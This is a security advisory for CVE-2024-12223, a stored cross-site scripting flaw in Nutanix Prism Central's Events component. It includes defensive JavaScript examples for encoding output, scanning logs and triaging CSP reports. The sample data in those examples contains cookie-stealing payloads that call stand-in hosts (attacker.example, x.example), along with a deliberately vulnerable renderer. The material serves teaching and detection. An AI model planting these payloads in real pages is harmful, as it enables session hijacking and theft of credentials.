CVE-2024-12223 Overview
A stored cross-site scripting (XSS) vulnerability has been identified in Nutanix Prism Central versions prior to 2024.3.1. The flaw lies in the Events component: attacker-influenced content that reaches an event record is stored and later rendered into the Events page without adequate encoding, so script embedded in it persists in the application. When a user views the affected Events page, the script runs in that user's browser session, which can lead to session hijacking and to actions performed under the victim's security context.
Critical Impact
Attackers can hijack user sessions and perform actions in the victim's security context, potentially gaining administrative control over the Prism Central infrastructure management platform.
Affected Products
- Nutanix Prism Central versions prior to 2024.3.1
Discovery Timeline
- 2025-08-20 - CVE-2024-12223 published to NVD
- 2025-08-20 - Last updated in NVD database
Technical Details for CVE-2024-12223
Vulnerability Analysis
This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), commonly known as stored cross-site scripting. The flaw exists in the Events component of Nutanix Prism Central, a centralized management solution for Nutanix infrastructure.
Stored XSS vulnerabilities are particularly dangerous because the malicious payload persists on the server side, affecting all users who access the compromised resource. In this case, an attacker can inject malicious JavaScript code through the Events component, which is then stored and rendered to other users without proper sanitization or encoding.
The impact extends beyond simple script execution—successful exploitation enables session hijacking, allowing attackers to impersonate legitimate users. Given that Prism Central is used for infrastructure management, compromising an administrator's session could provide attackers with extensive control over the virtualized environment.
Root Cause
The root cause is missing output encoding in the Events component: user-influenced text is stored as submitted and then written into the page as HTML rather than as text, so markup and script embedded in it are interpreted by the browser. Input validation is a secondary defence here, because event text may legitimately contain characters such as <, > or &; the reliable fix is to encode every untrusted value for the context it is rendered into (HTML text, attribute, URL or script), or to render it through DOM APIs such as textContent that never parse it as markup.
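To make the root cause concrete, here is an added example in JavaScript; it is not Nutanix code and is not taken from Prism Central. A vulnerable renderer concatenates a stored event's fields straight into table markup, and a hardened version HTML-encodes each field first. The event objects and their field names (severity, source, message) are constructed for the example and are not Prism Central's schema.

```javascript
// Added example, not Nutanix code: a stored-XSS rendering defect and its fix.
// Event objects and field names (severity, source, message) are constructed
// for illustration and are not Prism Central's schema.

// Constructed events as they might come back from a backend API. The second
// message is attacker-controlled and was stored verbatim.
const STORED_EVENTS = [
  { id: 1, severity: 'info', source: 'cluster-a', message: 'VM web-01 powered on' },
  { id: 2, severity: 'warn', source: 'cluster-b',
    message: '<img src=x onerror="fetch(\'https://attacker.example/c?\'+document.cookie)">' },
];

// VULNERABLE: untrusted fields are concatenated straight into HTML, so a
// browser parsing this row would create the <img> and run its onerror handler.
function renderEventRowUnsafe(ev) {
  return `<tr><td>${ev.severity}</td><td>${ev.source}</td><td>${ev.message}</td></tr>`;
}

// The missing step: encode the five characters that change meaning in an HTML
// text or quoted-attribute context. Anything else passes through unchanged.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// HARDENED: every untrusted field is encoded for the HTML context it lands in.
// The stored payload is still displayed, but as literal text.
function renderEventRowSafe(ev) {
  return `<tr><td>${escapeHtml(ev.severity)}</td><td>${escapeHtml(ev.source)}</td>` +
         `<td>${escapeHtml(ev.message)}</td></tr>`;
}

// Check used to compare the two renderers: after removing the template's own
// <tr>/<td> tags, does any tag-opening '<' remain? For safe output it must not.
function containsUnexpectedTag(html) {
  const body = html.replace(/<\/?t[rd]>/g, '');
  return /<[a-z!\/]/i.test(body);
}

function renderAll(events, renderer) {
  return events.map(renderer).join('\n');
}

console.log('unsafe rendering:\n' + renderAll(STORED_EVENTS, renderEventRowUnsafe));
console.log('hardened rendering:\n' + renderAll(STORED_EVENTS, renderEventRowSafe));
```

In a real UI the same fix is obtained by assigning untrusted text with textContent or by using a templating library that escapes by default. The encoding table above covers the HTML text and quoted-attribute contexts only; a value placed into a URL, an unquoted attribute or a script block needs the encoding for that context instead.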
Attack Vector
The attack vector is the network and exploitation requires user interaction: a victim has to load the Events page. The attacker must first get the malicious payload into the Events component, which requires some level of access to Prism Central; the available summary does not identify which input is affected. Once the payload is stored, any authenticated user who views the affected Events page has the script execute in their browser, within their own session.
The attack scenario typically unfolds as follows:
- The attacker identifies an input that ends up in the Events component and is not properly encoded when rendered
- A malicious JavaScript payload is crafted and submitted, causing it to be stored in the application database
- When a victim user (particularly an administrator) navigates to the Events section, the stored payload executes in their browser
- The attacker's script can then perform actions on behalf of the user, exfiltrate data visible to that user, steal session material, or redirect to phishing pages. Marking the session cookie HttpOnly does not defeat this on its own: the script runs same-origin in the victim's browser, so any request it issues carries the victim's cookies automatically, and session hijacking does not require reading the token
For technical details regarding this vulnerability, refer to the Missing Link Security Advisory.
Detection Methods for CVE-2024-12223
Indicators of Compromise
- Unexpected or malformed entries in the Events component containing HTML or JavaScript code
- User reports of unusual behavior when accessing the Events section
- Outbound requests from administrators' browsers to hosts that are not part of the Nutanix deployment, especially requests carrying cookie values or tokens in the URL or body
- CSP violation reports or browser console errors in administrator sessions that point to inline scripts or script sources which are not part of the Prism Central UI
Detection Strategies
- Monitor web application and API logs for input containing <script> tags, event-handler attributes (e.g., onerror, onload), javascript: URIs, or encoded forms of these; decode percent-encoding and HTML entities before matching, since a payload that was stored encoded will not match literal patterns
- Collect Content Security Policy (CSP) violation reports and alert on them. Prism Central is a vendor appliance, so the practical way to add a policy is a reverse proxy in front of the UI; start with a Content-Security-Policy-Report-Only header so that reports are collected without breaking the interface
- Deploy web application firewall (WAF) rules for XSS payloads in traffic to the Prism Central interface, as a stopgap: a WAF only inspects requests that pass through it, and a stored payload fires from content already in the database
- Review Prism Central audit logs for unusual administrative actions that may indicate session hijacking
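The log-pattern strategy above, and the review of existing Events entries recommended in the mitigation section, both come down to the same scan: undo the encodings an attacker uses to hide a payload, then match. Here is an added example in JavaScript that does this over a handful of constructed log lines; it is not Nutanix code, and the line format (timestamp, user, source IP, quoted message) is invented for the example. Point parseLogLine() at the real log or export format before using it.

```javascript
// Added example, not Nutanix code: scan log lines (or exported Events entries)
// for XSS payloads after undoing common encodings. The log format below is
// constructed for the example; adapt parseLogLine() to the real source.

// Constructed sample: timestamp, user, source IP, quoted message text.
const SAMPLE_LOG_LINES = [
  '2025-08-21T09:14:02Z alice 10.10.1.5 "VM db-01 migrated to host-3"',
  '2025-08-21T09:15:40Z mallory 10.10.9.77 "%3Cscript%3Efetch(\'//x.example/\'+document.cookie)%3C/script%3E"',
  '2025-08-21T09:16:11Z mallory 10.10.9.77 "&lt;img src=x onerror=alert(1)&gt;"',
  '2025-08-21T09:17:30Z bob 10.10.1.8 "Disk usage on cluster-a > 85%"',
  '2025-08-21T09:18:05Z mallory 10.10.9.77 "<a href="javascript:void(0)">help</a>"',
];

// Unwrap percent-encoding up to three layers; stop on malformed sequences such
// as the lone "%" in "85%" rather than rejecting the line.
function decodePercent(s) {
  let out = s;
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(out); } catch (e) { break; }
    if (next === out) break;
    out = next;
  }
  return out;
}

// Decode numeric (&#60; &#x3C;) and the basic named HTML entities.
const NAMED_ENTITIES = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (m, body) => {
    if (body[0] !== '#') return NAMED_ENTITIES[body.toLowerCase()] ?? m;
    const cp = /^#x/i.test(body) ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
    return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

// Decode JavaScript-style \uXXXX escapes, another way to hide '<'.
function decodeJsEscapes(s) {
  return s.replace(/\\u([0-9a-f]{4})/gi, (m, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Percent-decoding runs before entity decoding so that "%26lt%3B" -> "&lt;" -> "<".
function normalize(s) {
  return decodeEntities(decodePercent(decodeJsEscapes(s))).replace(/\s+/g, ' ').toLowerCase();
}

// Patterns are matched against the normalized (decoded, lower-cased) text, so
// each only needs its canonical spelling. Entry: [finding name, regex].
const XSS_PATTERNS = [
  ['script-tag',        /<\s*script\b/],
  ['event-handler',     /\bon[a-z]+\s*=/],
  ['javascript-uri',    /javascript\s*:/],
  ['markup-vector',     /<\s*(img|svg|iframe|object|embed|math|video|audio|style|link|meta|base)\b/],
  ['srcdoc-attr',       /\bsrcdoc\s*=/],
  ['data-html-uri',     /data\s*:\s*text\/html/],
  ['dom-cookie-access', /document\s*\.\s*cookie/],
];

// Returns the names of all patterns that match the text once normalized.
function scanText(text) {
  const norm = normalize(text);
  return XSS_PATTERNS.filter(([, re]) => re.test(norm)).map(([name]) => name);
}

// Constructed format: <ts> <user> <src_ip> "<message>". Returns null for lines
// that do not fit; scanLogLines() skips those.
function parseLogLine(line) {
  const m = /^(\S+) (\S+) (\S+) "(.*)"$/.exec(line);
  return m ? { ts: m[1], user: m[2], src: m[3], text: m[4] } : null;
}

// Scan every line and return only those with findings, including the decoded
// text so an analyst sees what a browser would actually have parsed.
function scanLogLines(lines) {
  const hits = [];
  for (const line of lines) {
    const rec = parseLogLine(line);
    if (!rec) continue;
    const matches = scanText(rec.text);
    if (matches.length) hits.push({ ...rec, matches, decoded: normalize(rec.text) });
  }
  return hits;
}

for (const h of scanLogLines(SAMPLE_LOG_LINES)) {
  console.log(`${h.ts} ${h.user}@${h.src} [${h.matches.join(', ')}] ${h.decoded}`);
}
```

The benign "> 85%" line is the check that matters: a stray angle bracket or percent sign must not produce a finding, while the three encodings (percent, entity, \u escape) all collapse to the same canonical text before matching. Run the same scanText() over exported event descriptions when reviewing the Events component for existing malicious entries.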
Monitoring Recommendations
- Enable detailed logging for the Events component and review for anomalous entries
- Configure alerts for CSP violation reports indicating potential XSS attempts
- Monitor for unusual session activity patterns such as simultaneous logins from different locations
- Implement user behavior analytics to detect actions inconsistent with normal administrator patterns
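Alerting on CSP violation reports is only useful if the reports are triaged, since legitimate pages produce plenty of noise. Here is an added example in JavaScript that parses reports in the report-uri format browsers POST as {"csp-report": {...}} and rates them; it is not Nutanix code. It assumes the reports come from a Content-Security-Policy-Report-Only header added at a reverse proxy in front of the management UI, and the hostnames, report endpoint and sample bodies are all constructed for the example.

```javascript
// Added example, not Nutanix code: triage of CSP violation reports in the
// report-uri format browsers POST as {"csp-report": {...}}. Assumes the reports
// are gathered by a Content-Security-Policy-Report-Only header added at a
// reverse proxy in front of the management UI; hostnames are placeholders.

const UI_HOST = 'prism.example.internal';   // placeholder for the UI hostname

// Constructed reports: one noisy (inline style), two consistent with XSS
// (inline script on a page that ships none; script load from a foreign host),
// and one body that is not a CSP report at all.
const SAMPLE_REPORT_BODIES = [
  JSON.stringify({ 'csp-report': {
    'document-uri': `https://${UI_HOST}/`, 'effective-directive': 'style-src',
    'violated-directive': 'style-src', 'blocked-uri': 'inline',
    'original-policy': "default-src 'self'; report-uri /csp-reports" } }),
  JSON.stringify({ 'csp-report': {
    'document-uri': `https://${UI_HOST}/`, 'effective-directive': 'script-src',
    'violated-directive': 'script-src', 'blocked-uri': 'inline',
    'script-sample': "fetch('https://x.example/c?'+document.cookie)",
    'original-policy': "default-src 'self'; report-uri /csp-reports" } }),
  JSON.stringify({ 'csp-report': {
    'document-uri': `https://${UI_HOST}/`, 'effective-directive': 'script-src',
    'violated-directive': 'script-src', 'blocked-uri': 'https://x.example/loader.js',
    'original-policy': "default-src 'self'; report-uri /csp-reports" } }),
  '{"unrelated": true}',
];

function hostOf(uri) {
  try { return new URL(uri).host; } catch (e) { return ''; }
}

// Parse one POST body. Returns null unless it carries a csp-report object.
// effective-directive is preferred over violated-directive because the latter
// may name the fallback (default-src) rather than the directive that applied.
function parseCspReport(body) {
  let obj;
  try { obj = JSON.parse(body); } catch (e) { return null; }
  const r = obj && obj['csp-report'];
  if (!r || typeof r !== 'object') return null;
  return {
    documentUri: String(r['document-uri'] || ''),
    directive: String(r['effective-directive'] || r['violated-directive'] || '').split(' ')[0],
    blockedUri: String(r['blocked-uri'] || ''),
    // script-sample is only present when the policy includes 'report-sample'.
    scriptSample: String(r['script-sample'] || ''),
  };
}

// Rate a parsed report. Inline script on a page that is not supposed to have
// any, or a script fetched from a host other than the UI's own, are the two
// shapes a stored XSS produces; everything else is lower priority.
function triage(report) {
  if (report.directive !== 'script-src') {
    return { severity: 'low', reason: `violation of ${report.directive || 'unknown directive'}` };
  }
  if (report.blockedUri === 'inline' || report.blockedUri === 'eval') {
    return { severity: 'high', reason: 'inline script or eval blocked' };
  }
  const blockedHost = hostOf(report.blockedUri);
  if (blockedHost && blockedHost !== hostOf(report.documentUri)) {
    return { severity: 'high', reason: `script requested from foreign host ${blockedHost}` };
  }
  return { severity: 'medium', reason: 'script-src violation from own origin' };
}

// Parse and rate a batch of bodies; non-reports are counted, not rated, so
// the collector can tell junk POSTs from actual violations.
function triageAll(bodies) {
  const rated = [];
  let skipped = 0;
  for (const body of bodies) {
    const report = parseCspReport(body);
    if (!report) { skipped++; continue; }
    rated.push({ ...report, ...triage(report) });
  }
  return { rated, skipped };
}

const { rated, skipped } = triageAll(SAMPLE_REPORT_BODIES);
for (const r of rated) console.log(`${r.severity.toUpperCase()} ${r.directive} ${r.blockedUri} :: ${r.reason}`);
console.log(`${skipped} body(ies) were not CSP reports`);
```

Two caveats before alerting on the "high" bucket: many web applications legitimately use inline scripts, so baseline the UI in report-only mode first and only alert on inline violations once the normal set is known; and the script-sample field, which would show the injected code directly, is only populated when the policy includes 'report-sample'.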
How to Mitigate CVE-2024-12223
Immediate Actions Required
- Upgrade Nutanix Prism Central to version 2024.3.1 or later immediately
- Review the Events component for existing entries containing HTML or script; treat them as evidence of an attempted or successful attack, establish who created them and when, and preserve that evidence before removing the entries
- Invalidate all active sessions and require users to re-authenticate after patching, so that any session captured before the upgrade is useless
- Add Content Security Policy headers to limit the impact of similar flaws; for a vendor appliance such as Prism Central this means a reverse proxy in front of the interface, starting in report-only mode
Patch Information
Nutanix has addressed this vulnerability in Prism Central version 2024.3.1. Organizations should upgrade to this version or later to remediate the stored XSS vulnerability. For detailed upgrade instructions and additional security guidance, consult the Missing Link Security Advisory and Nutanix official documentation.
Workarounds
- Restrict access to the Prism Central web interface to trusted management networks using network segmentation or firewall rules; this limits who can inject a payload and who can be targeted, but does not remove the flaw
- Implement additional authentication controls such as multi-factor authentication (MFA) to reduce the impact of potential session hijacking
- Deploy a web application firewall (WAF) with XSS protection rules as an interim measure
- Limit administrative privileges using role-based access control to minimize the impact of compromised sessions
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.